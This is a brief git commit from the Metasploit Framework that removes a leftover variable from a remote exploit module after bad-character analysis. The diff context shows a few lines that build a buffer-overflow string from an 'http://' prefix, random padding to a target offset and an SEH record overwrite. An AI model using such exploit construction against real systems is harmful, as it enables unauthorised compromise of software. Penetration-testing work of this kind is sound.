Forgot to remove this after badchar analysis

unstable
sinn3r 2012-11-30 02:17:08 -06:00
parent 37f731fe7d
commit 9d52048d7f
1 changed files with 0 additions and 2 deletions

View File

@ -64,8 +64,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
c = ''
buf = 'http://'
buf << rand_text_alpha_upper(target['Offset'])
buf << generate_seh_record(target.ret)